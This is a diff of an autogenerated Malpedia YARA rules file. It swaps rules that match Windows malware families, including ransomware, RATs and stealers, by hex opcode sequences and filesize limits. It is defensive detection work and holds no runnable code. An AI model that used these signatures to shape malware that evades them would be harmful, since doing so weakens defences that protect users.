-		$sequence_1 = { 4885c9 7405 e8???????? 488b8ba0000000 488d057f5c0000 483bc8 7405 }
-		$sequence_2 = { 48894c2408 4883ec18 c744240400000000 8b4c2404 8b442428 }
-		$sequence_3 = { c68424e700000020 889c24e8000000 888424e9000000 c68424ea0000002d c68424eb00000002 888c24ec000000 c64424381a }
-		$sequence_4 = { 83c008 898424f4080000 448b05???????? 49d1e0 }
-		$sequence_5 = { c644243331 c644243439 c644243539 884c2436 }
-		$sequence_6 = { c684248600000067 88942487000000 c684248800000031 c684248900000039 c684248a00000039 }
-		$sequence_7 = { 488b442450 8138a0000000 7470 833d????????00 7528 }
-		$sequence_8 = { 6800020000 57 8d95000d0000 52 }
-		$sequence_9 = { 888c24fd000000 c68424b000000012 888424b1000000 889c24b2000000 c68424b300000019 c68424b400000034 }
-		$sequence_10 = { 889c2451020000 c684245202000073 c68424530200006c c684245402000065 c68424550200006e c684245602000000 }
-		$sequence_11 = { 488d0d67a70000 e8???????? 488d1556aa0000 4c8d050f3d0000 488d4c38de 41b903000000 482bd1 }
-		$sequence_12 = { c68424eb00000018 c68424ec0000003a c68424ed00000031 c68424ee00000020 c68424ef00000039 c68424f000000030 }
-		$sequence_13 = { c68424f80200006c c68424f902000073 c68424fa02000074 c68424fb02000072 }
-		$sequence_14 = { 390424 7d46 48630c24 488b442428 440fbe0408 4863442420 33d2 }
-		$sequence_15 = { 33c9 66898d60060000 6806020000 51 8d9562060000 52 e8???????? }
+		$sequence_0 = { c68561ffffff16 c68562ffffff23 c68563ffffff12 c68564ffffff23 c68565ffffff70 c68566ffffff23 }
+		$sequence_1 = { 8985ccfdffff 85c0 0f8431020000 8b483c 03c8 0fb74118 3b85c4fdffff }
+		$sequence_2 = { 7431 b802000000 2bc1 0345f0 8945f0 8b45f0 99 }
+		$sequence_3 = { f7fb 88540df1 41 83f90a 72de 8d45f1 898588feffff }
+		$sequence_4 = { 33c5 8945fc 53 56 0f57c0 894de8 33f6 }
+		$sequence_5 = { 83c408 eb35 0fb605???????? b225 50 }
+		$sequence_6 = { 51 52 e8???????? 83c408 8b8c24f4050000 }
+		$sequence_7 = { 6849372c4f ba0f000000 8d1c3f e8???????? 83c408 68???????? }
+		$sequence_8 = { 7415 83e801 0f8595010000 c745e498024300 e9???????? 894de0 }
+		$sequence_9 = { 8bf7 8d7b75 0f1f4000 8a06 8d7601 0fb6c8 83e953 }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 492544
 }
-rule MALPEDIA_Win_Gspy_Auto : FILE
+rule MALPEDIA_Win_Revenant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cfcf9b9b-4569-5d0f-801d-7a4c03469882"
+		id = "d3da3715-670e-5d1a-8c9a-150b3eadfd7c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gspy_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.revenant_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "5f09532c5cfce71a555d1d7b8c6eb07037f464516d07c67472b924dd34736987"
+		logic_hash = "bc25d04495c8de2d240671fc2471b933071b7fc14621d4283ee86183238cabeb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115712,32 +115639,32 @@ rule MALPEDIA_Win_Gspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8d54241b 52 e8???????? 8944242c 8a442413 8b5c242c }
-		$sequence_1 = { 83c01c 50 55 56 ff15???????? 85c0 740a }
-		$sequence_2 = { 8a442412 3cff 7567 8b4d04 66c744241c3f2a c744241ec0744200 33c0 }
-		$sequence_3 = { c20400 8b0d???????? 56 33c0 57 8b3d???????? 3bcd }
-		$sequence_4 = { 85c0 757a 8b442414 8b08 8d542420 52 50 }
-		$sequence_5 = { 51 ff15???????? 85ff 7409 8d442418 e8???????? 83c304 }
-		$sequence_6 = { 8bf0 89742410 85f6 7449 33c0 897c2414 }
-		$sequence_7 = { 57 8bf8 32c0 88442407 85ff 0f8456010000 53 }
-		$sequence_8 = { 8b4124 ffd0 85c0 0f8464ffffff 8b442410 8b08 8b5108 }
-		$sequence_9 = { 7408 3c09 7c0e 3c0d 7f0a 83fa02 }
+		$sequence_0 = { 41803c1c20 488d4301 7405 4889c3 ebeb 8d4b01 }
+		$sequence_1 = { 7592 41c744240801000000 b801000000 4881c458010000 }
+		$sequence_2 = { 31c9 488b2d???????? 4989f0 ffd5 4c8b35???????? 85c0 7521 }
+		$sequence_3 = { 488b542420 e8???????? 4c8b442428 31d2 488b4c2420 e8???????? }
+		$sequence_4 = { e8???????? 4885c0 4889c6 7465 }
+		$sequence_5 = { 4531c9 440fb74738 488b4c2448 e8???????? 4885c0 }
+		$sequence_6 = { f3a4 488b7c2438 8b4c2448 f3aa }
+		$sequence_7 = { 4889f1 ff15???????? b940000000 89c5 4889ea }
+		$sequence_8 = { ff15???????? 488d0dc82d0000 31f6 89c2 e8???????? e9???????? 837f3c00 }
+		$sequence_9 = { 89c5 4889ea 896c244c ff15???????? 448b44244c }
 
 	condition:
-		7 of them and filesize < 421888
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Darkshell_Auto : FILE
+rule MALPEDIA_Win_Tollbooth_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0b6aea26-4d2d-5fe4-85ac-1a4c560ab87d"
+		id = "8571d861-b206-5a28-be63-4a9911495781"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkshell_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tollbooth"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tollbooth_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "adda1c8d572ab121457592ba92d94ead9ada07c703fcce314ed00968f454839e"
+		logic_hash = "55924965cb8b6210eb05a8f6dd43f9ad6aeae8d8c356e1fd55efb53f124eaedf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115751,32 +115678,32 @@ rule MALPEDIA_Win_Darkshell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c004 8901 83c014 8902 6681380b01 7511 }
-		$sequence_1 = { 8b442434 83c410 8b8088000000 85c0 }
-		$sequence_2 = { c744246044000000 ff15???????? 8be8 85ed 0f8494000000 8bbc2488000000 }
-		$sequence_3 = { 51 50 8b442420 50 ff15???????? }
-		$sequence_4 = { 8d7e08 f7c2feffffff 767a 668b07 8bc8 81e100f00000 6681f90030 }
-		$sequence_5 = { ffd6 5e c20400 8b15???????? }
-		$sequence_6 = { 8b35???????? 48 7457 48 742b }
-		$sequence_7 = { f3ab 66ab aa 8b442410 83c9ff 8b5008 33c0 }
-		$sequence_8 = { 5e c20400 8b15???????? 68???????? 52 }
-		$sequence_9 = { 03ca c1e80c 51 50 68???????? }
+		$sequence_0 = { e8???????? 4885c0 0f8428010000 488d7827 4883e7e0 488947f8 4c8b442420 }
+		$sequence_1 = { eb67 41baa0860100 413bea 7207 bb06000000 eb55 41ba10270000 }
+		$sequence_2 = { 7451 488b7d07 488b4dff 48894dbf 488bd7 482bd1 48c1fa04 }
+		$sequence_3 = { e9???????? 488d8ab8000000 e9???????? 488d8a68000000 e9???????? 488d8ad8000000 e9???????? }
+		$sequence_4 = { 4885ff 757e eb03 498bfe 807e2400 7413 e8???????? }
+		$sequence_5 = { 803902 7558 488b4908 488b5108 483b5110 7421 0fb645e0 }
+		$sequence_6 = { 48895c2450 48895c2460 48c74424680f000000 41b80a000000 488d1566350900 488d4c2450 e8???????? }
+		$sequence_7 = { 898b88000000 83bb8800000003 0f8286000000 8b8bf4160000 0fb69388000000 488b83f8160000 80ea03 }
+		$sequence_8 = { eb4d 488b8100010000 4885c0 7403 f0ff08 488d055d200300 48899900010000 }
+		$sequence_9 = { 83e11f 418bd7 81c101010000 41c1ef05 83e21f 418bc7 41894d7c }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 1907712
 }
-rule MALPEDIA_Win_Flawedgrace_Auto : FILE
+rule MALPEDIA_Win_Aurora_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "38c84019-ad8d-570b-aa3f-e7acbb9a406b"
+		id = "cb6e66dc-0b30-52d7-abd2-183f4137b9af"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flawedgrace_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aurora_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "c317abd86b3ba4cb04110fcc0785854b53fd3854465be9cdca5825ec671c6c3a"
+		logic_hash = "736e5133ae609420c62fd5eab55e12d52695b2d2a929e74285f1e9a94056c135"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115790,32 +115717,32 @@ rule MALPEDIA_Win_Flawedgrace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcf e8???????? 83c404 85c0 0f84a8010000 0f31 52 }
-		$sequence_1 = { 0fb6c0 894dec 8bcb c1e918 8b0485e0bb4500 33048de0bf4500 894510 }
-		$sequence_2 = { c6853bf5ffff00 c6853cf5ffffff c6853df5ffff25 c6853ef5ffff30 c6853ff5ffff20 c68540f5ffff40 c68541f5ffff00 }
-		$sequence_3 = { c6858ddaffff33 c6858edaffff00 c6858fdaffff00 c68590daffff00 c68591daffff00 c68592daffff00 c68593daffff00 }
-		$sequence_4 = { c68565f2ffff00 c68566f2ffff85 c68567f2ffffc0 c68568f2ffff74 c68569f2ffff3a c6856af2ffff81 c6856bf2ffff7d }
-		$sequence_5 = { 7416 8b85ccc0ffff 50 6a00 ff15???????? }
-		$sequence_6 = { 8b0495b8d34600 f644082801 7421 57 e8???????? 59 50 }
-		$sequence_7 = { c685abfdffff00 c685acfdffff00 c685adfdffff00 c685aefdffff00 c685affdffff00 c685b0fdffff00 c685b1fdffff00 }
-		$sequence_8 = { 3934bdb8d34600 7531 e8???????? 8904bdb8d34600 85c0 7514 6a0c }
-		$sequence_9 = { c685d3c8ffff05 c685d4c8ffff00 c685d5c8ffff00 c685d6c8ffff00 c685d7c8ffffe8 c685d8c8ffff48 c685d9c8ffff0f }
+		$sequence_0 = { 52 8d4dc0 e8???????? 68???????? c645fc01 e8???????? }
+		$sequence_1 = { 6a1f 68???????? c745d40f000000 c745d000000000 c645c000 e8???????? c645fc01 }
+		$sequence_2 = { 0f8259ffffff 8d4de4 e8???????? 8bc6 8b4df4 64890d00000000 59 }
+		$sequence_3 = { 75f9 2bca 51 53 8d4dd0 e8???????? }
+		$sequence_4 = { 0f45c2 50 e8???????? 8bfb }
+		$sequence_5 = { 68???????? 8d8de4f1ffff c785f8f1ffff0f000000 c785f4f1ffff00000000 c685e4f1ffff00 e8???????? }
+		$sequence_6 = { c785b8efffff0f000000 c785b4efffff00000000 c685a4efffff00 e8???????? 8d8dbcefffff }
+		$sequence_7 = { 0f8483000000 c1e706 03f8 83c106 894ddc 7869 8bc7 }
+		$sequence_8 = { 68???????? 8d8d24f1ffff c78538f1ffff0f000000 c78534f1ffff00000000 }
+		$sequence_9 = { a1???????? 33c5 50 8d45f4 64a300000000 c745ec00000000 83ec18 }
 
 	condition:
-		7 of them and filesize < 966656
+		7 of them and filesize < 827392
 }
-rule MALPEDIA_Win_Bert_Auto : FILE
+rule MALPEDIA_Win_Qadars_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "92a36b55-e0d9-554d-851b-77dda3f7bbeb"
+		id = "db370ffd-dc25-54ab-be3c-753161f66e40"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bert"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bert_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qadars_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "a6e868967ddeea2e01bd4f16c21024fbdee2d69c00cbdbbbdfda193aebc93a0a"
+		logic_hash = "b7f3cdd5f9bd5d75d1b4c3d8620e10078807a9df5c67d92510598cbd69ac717d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115829,32 +115756,38 @@ rule MALPEDIA_Win_Bert_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 488945e8 488b45e8 488945e0 }
-		$sequence_1 = { 0fb74006 0fb7c0 3945f4 0f8c5efeffff 488b45b8 }
-		$sequence_2 = { e8???????? 488945f8 488b45f8 4889c1 e8???????? 488945c8 }
-		$sequence_3 = { 488b8558ffffff 4889c1 488b05???????? ffd0 }
-		$sequence_4 = { c745f000000000 e9???????? 8b45f0 4863d0 4889d0 48c1e002 }
-		$sequence_5 = { 48898570ffffff 8b45d0 4863d0 4889d0 48c1e002 4801d0 }
-		$sequence_6 = { 4883ec10 48894d10 48895518 488b4510 488945f8 488b4518 }
-		$sequence_7 = { 488945d8 488b45d8 480508010000 488945d0 48c745f800000000 }
-		$sequence_8 = { 4801d0 8b4008 89c1 488d9524ffffff }
-		$sequence_9 = { 48c1e810 0fb7c0 4801c2 488b8578ffffff 488910 eb21 488b8578ffffff }
+		$sequence_0 = { 85c0 7410 8d642400 8b0b 48 c7048100000000 75f4 }
+		$sequence_1 = { 8910 8b4510 85c0 7406 c700???????? 8b4514 }
+		$sequence_2 = { 56 8d4dcc e8???????? 8d4dcc e8???????? 8bc6 5e }
+		$sequence_3 = { 8b4dec 39590c 7405 ff490c eb25 8b4104 3bc3 }
+		$sequence_4 = { 6a04 8d550c 52 8d443801 }
+		$sequence_5 = { 8945fc 8b45e8 6a10 8945f8 e8???????? 83c404 }
+		$sequence_6 = { 8b4510 8b08 51 52 8d4df0 897704 8975f4 }
+		$sequence_7 = { 8b00 50 e8???????? 8b45fc 50 e8???????? 83c408 }
+		$sequence_8 = { 6a00 8d4df4 51 6a04 8d55f8 }
+		$sequence_9 = { 83c40c 6805010000 8d8df8feffff 51 }
+		$sequence_10 = { 6a01 8b55fc 52 ff15???????? 83c408 }
+		$sequence_11 = { 6a01 6a08 ff15???????? 83c408 }
+		$sequence_12 = { 51 8b55f0 52 ff15???????? 83c40c }
+		$sequence_13 = { 50 8d8d98fcffff 51 e8???????? }
+		$sequence_14 = { 8945fc 6a02 8b85d4fdffff 50 }
+		$sequence_15 = { 750b 68???????? ff15???????? 6a00 }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Wastedlocker_Auto : FILE
+rule MALPEDIA_Win_Roopirs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1b25ab78-4d17-5567-bfe5-7c9cd4852d3a"
+		id = "48848479-790a-5ff7-91e3-208639c13d18"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wastedlocker_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roopirs_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "2c12d9ce655c1e066154e40493d5fbd7e9ce57fd1e7f44c9306209ae45654264"
+		logic_hash = "81aa2556d7e68cc4aaa84172c724098a8fdf541552ef6b7b19cd3ea7889cf5e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115868,32 +115801,71 @@ rule MALPEDIA_Win_Wastedlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a2a e8???????? 8b45fc 8b30 }
-		$sequence_1 = { 5b 7504 8365fc00 8b4508 ff30 ff15???????? 8b45fc }
-		$sequence_2 = { 8bc7 351ec34eee 50 53 e8???????? }
-		$sequence_3 = { ff15???????? 85c0 740f 6a02 57 ff15???????? }
-		$sequence_4 = { 51 8935???????? 8935???????? a3???????? a3???????? }
-		$sequence_5 = { e8???????? 8d85d0f3ffff 50 56 8d85b8edffff 50 8d85b0ebffff }
-		$sequence_6 = { 8918 33f6 eb26 ff15???????? 53 6a00 ff35???????? }
-		$sequence_7 = { 03c7 13cb a3???????? 0bc1 890d???????? 0f8456010000 8b4dfc }
-		$sequence_8 = { ff7508 e8???????? 2b4d08 8bf0 03f1 eb02 8bf1 }
-		$sequence_9 = { ff750c 6a00 ff35???????? ff15???????? 8b45f0 5f 5e }
+		$sequence_0 = { 51 ff15???????? 50 8d55d0 52 ff15???????? 8d4dc8 }
+		$sequence_1 = { 7433 c745fc3e000000 8b4dd8 51 68???????? }
+		$sequence_2 = { ff15???????? 898544ffffff e9???????? c745fc07000000 8d5584 52 8b45dc }
+		$sequence_3 = { 8d45b8 50 ff15???????? 8bd0 8d4dd0 }
+		$sequence_4 = { 51 8b5508 8b4234 8b4d08 8b5134 8b0a 50 }
+		$sequence_5 = { 8d4dcc ff15???????? c745fc0d000000 6aff ff15???????? c745fc0e000000 }
+		$sequence_6 = { 8d4db8 ff15???????? 0fbf55b0 85d2 7433 c745fc2f000000 }
+		$sequence_7 = { 52 8b45b0 50 ff15???????? 898570ffffff eb0a c78570ffffff00000000 }
+		$sequence_8 = { ff15???????? 8d4db8 ff15???????? c745fc16000000 8b55d8 }
+		$sequence_9 = { 8b550c 8d4dd8 ff15???????? c745fc02000000 6a01 8b45d8 50 }
+
+	condition:
+		7 of them and filesize < 344064
+}
+rule MALPEDIA_Win_Mykings_Spreader_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "96a12e80-b15f-580e-920d-d6c0d35464b0"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mykings_spreader_auto.yar#L1-L132"
+		license_url = "N/A"
+		logic_hash = "1bcd674173fea4b83a2f4219e8f61306a972490f94a89cfaf5e1f466fdec8eff"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 7519 51 55 8bce e8???????? 6a00 6a00 }
+		$sequence_1 = { 8b1e ff938c000000 8b0424 8b5014 85d2 7507 bf00000000 }
+		$sequence_2 = { e8???????? 837e1800 7439 8b4620 c1e003 89c7 8b4618 }
+		$sequence_3 = { 89c1 c745f401000000 3b4df4 723d ff4df4 8d7600 ff45f4 }
+		$sequence_4 = { 68???????? 50 ff15???????? a3???????? 83c0fe 40 40 }
+		$sequence_5 = { 8942fc 89d8 c1f81f 8b1424 8b7208 8b4a0c 29de }
+		$sequence_6 = { eb02 b300 e8???????? 8d45cc e8???????? c745cc00000000 58 }
+		$sequence_7 = { 33d2 b9???????? 8bc2 8bf2 c1f805 83e61f 8b0485a02e4100 }
+		$sequence_8 = { 89d8 29f0 85c0 7e39 8b55f4 85d2 7505 }
+		$sequence_9 = { 8b7508 8b36 8975c8 8b7d08 8b7f04 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 1581056
 }
-rule MALPEDIA_Win_Magala_Auto : FILE
+rule MALPEDIA_Win_Pinchduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7d1b8c98-54ed-55c3-acdc-c42ca1617fa1"
+		id = "e6e399a5-546d-5d19-a886-28527d9b5a32"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.magala_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pinchduke_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "3f293fe262d0ce646006496753cf31d4b0409f545d9ecd746ba425bd758b2984"
+		logic_hash = "e4ca655f5577580240493398d3de5b1f8ec351f42cf4a56b66853235bb7ac675"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115907,32 +115879,32 @@ rule MALPEDIA_Win_Magala_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 57 8d0451 e9???????? 8b4614 3bf7 746d }
-		$sequence_1 = { c745ec07000000 668945d8 e8???????? 837dec08 8d4dc4 6a04 51 }
-		$sequence_2 = { 50 8d8dd0fdffff e8???????? 6a1f 68???????? }
-		$sequence_3 = { 8da5f4feffff 8b4df4 64890d00000000 59 5f }
-		$sequence_4 = { 83bd8cfdffff00 7435 51 8d8d94fdffff e8???????? }
-		$sequence_5 = { e8???????? 83c404 ffd6 2bc7 3de0930400 76cf 68???????? }
-		$sequence_6 = { 56 8bf1 8b4e10 3bca 0f8214020000 8b450c 53 }
-		$sequence_7 = { c745c000000000 8b08 50 ff5108 8b45b8 8d55c0 }
-		$sequence_8 = { 6a00 8bcf e8???????? 8b4db4 85c9 7444 ff75b0 }
-		$sequence_9 = { 85db 744e 8bcb 8d5101 6690 8a01 }
+		$sequence_0 = { 83c40c 83c610 4f 75c3 e9???????? 8d45f0 50 }
+		$sequence_1 = { c6400274 e8???????? 56 e8???????? 59 59 89442414 }
+		$sequence_2 = { e8???????? 59 59 8d8df8fdffff 3bc1 7545 }
+		$sequence_3 = { c685f7fbffff00 e8???????? 8d85f4fbffff 50 e8???????? 83c414 84c0 }
+		$sequence_4 = { 68???????? 50 e8???????? 3bc7 59 59 740f }
+		$sequence_5 = { 334dcc 8d943a9979825a 8b7df4 d1c1 8955f0 c1c205 337df8 }
+		$sequence_6 = { c9 c3 833d????????00 752f 833d????????00 }
+		$sequence_7 = { 898618040000 6a08 50 ff15???????? 898608010000 5f 8bc6 }
+		$sequence_8 = { 03f9 037df0 8908 8b4824 334804 8975fc 334838 }
+		$sequence_9 = { 53 e8???????? 59 85ff 7472 c60700 e9???????? }
 
 	condition:
-		7 of them and filesize < 589824
+		7 of them and filesize < 223680
 }
-rule MALPEDIA_Win_Xpertrat_Auto : FILE
+rule MALPEDIA_Win_Rarstar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2a3325a-1f3d-5b66-85b8-5585a72bc5f8"
+		id = "9ce52f31-509a-51ae-aa52-a887d95b1b86"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xpertrat_auto.yar#L1-L155"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rarstar_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "aded1ec389d65d20277f2fe9db776abf2f31c80bf4b4d804698ab1524e2b5a6d"
+		logic_hash = "d80756ef2e17ab1b1759226b804a9ad7a0323babf981d01e1610768c38e321da"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115946,38 +115918,32 @@ rule MALPEDIA_Win_Xpertrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff08 40 0430 ff0a 4c 000c00 }
-		$sequence_1 = { 045c ff4d40 ff08 40 }
-		$sequence_2 = { 006c70ff 0808 008f38001b26 001b 0d002a2364 ff08 }
-		$sequence_3 = { 0870ff 0d80000700 0474 ff0478 }
-		$sequence_4 = { 0808 008a3800cc1c 5e 006c70ff 0808 008f38001b26 }
-		$sequence_5 = { ff05???????? 000d???????? 0878ff 0d98000700 6e }
-		$sequence_6 = { 6c 70ff 0808 008a3800cc1c }
-		$sequence_7 = { ff0a 250004003c 6c 70ff }
-		$sequence_8 = { ff15???????? 81c480000000 8d55c0 52 ff15???????? 8d4588 }
-		$sequence_9 = { ff15???????? 81c6a4000000 50 56 }
-		$sequence_10 = { ff15???????? 81e600020000 33c9 81fe00020000 }
-		$sequence_11 = { ff15???????? 81c608030000 8d45e8 56 }
-		$sequence_12 = { ff15???????? 81c608030000 8d8568ffffff 56 }
-		$sequence_13 = { ff15???????? 81e600200000 33d2 81fe00200000 }
-		$sequence_14 = { ff15???????? 81c480000000 8d8df8fcffff 51 }
-		$sequence_15 = { ff15???????? 833d????????00 7505 dc7dc0 }
+		$sequence_0 = { 89742410 33ed ff15???????? 8b542418 8b3d???????? 52 89442430 }
+		$sequence_1 = { eb26 8d4508 8db664c54000 6a00 50 ff36 }
+		$sequence_2 = { f7d1 2bf9 899c2430030000 8bc1 8bf7 8bfa 899c242c030000 }
+		$sequence_3 = { 8bc6 5e c20400 81ec24030000 53 }
+		$sequence_4 = { 8b0485c0d94000 03c6 8a5004 f6c201 0f849e010000 }
+		$sequence_5 = { 33db 8a940c20010000 8a5c0c20 03c2 03c3 25ff000080 7907 }
+		$sequence_6 = { 81e200008000 52 6a00 6a00 }
+		$sequence_7 = { 899c242c030000 899c2428030000 899c2424030000 899c2420030000 bf???????? 83c9ff }
+		$sequence_8 = { 7405 be01000000 8b442418 57 }
+		$sequence_9 = { 0f8412010000 85f6 779a 8b5c241c 6a00 }
 
 	condition:
-		7 of them and filesize < 8560640
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Play_Auto : FILE
+rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fb8bcd82-2890-51e9-aef7-15cdb7334359"
+		id = "3fa79262-0c02-5cc9-a3a6-873095c530cc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.play"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.play_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flying_dutchman_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "98ed430384a69d155a8a3b8add1f6db92e55c318ad1d4defbfbdd225c9837ee9"
+		logic_hash = "d533074e01136dd41c79c95680e27071c66cb57e7811b397b8be14c8164a2230"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115991,32 +115957,32 @@ rule MALPEDIA_Win_Play_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c9 7ff1 eb1d 8d85b1feffff 03c1 50 }
-		$sequence_1 = { 0f1005???????? 8945ac b854040000 6689856cffffff b8e0690000 0f114588 052496ffff }
-		$sequence_2 = { 898518feffff b879180000 0f118594feffff 898534ffffff f30f7e05???????? a1???????? 660fd68500ffffff }
-		$sequence_3 = { 02c0 02c2 888596feffff b9???????? e8???????? 8a85acfeffff }
-		$sequence_4 = { 8a857cfcffff fec0 c745e43d000000 0245fd 8845ff 888521ffffff b83e000000 }
-		$sequence_5 = { bbb410624c 8b0d???????? e8???????? 6aff ff75e8 ffd0 }
-		$sequence_6 = { e8???????? 33d2 8b4df4 f7f6 8bc2 8945e4 }
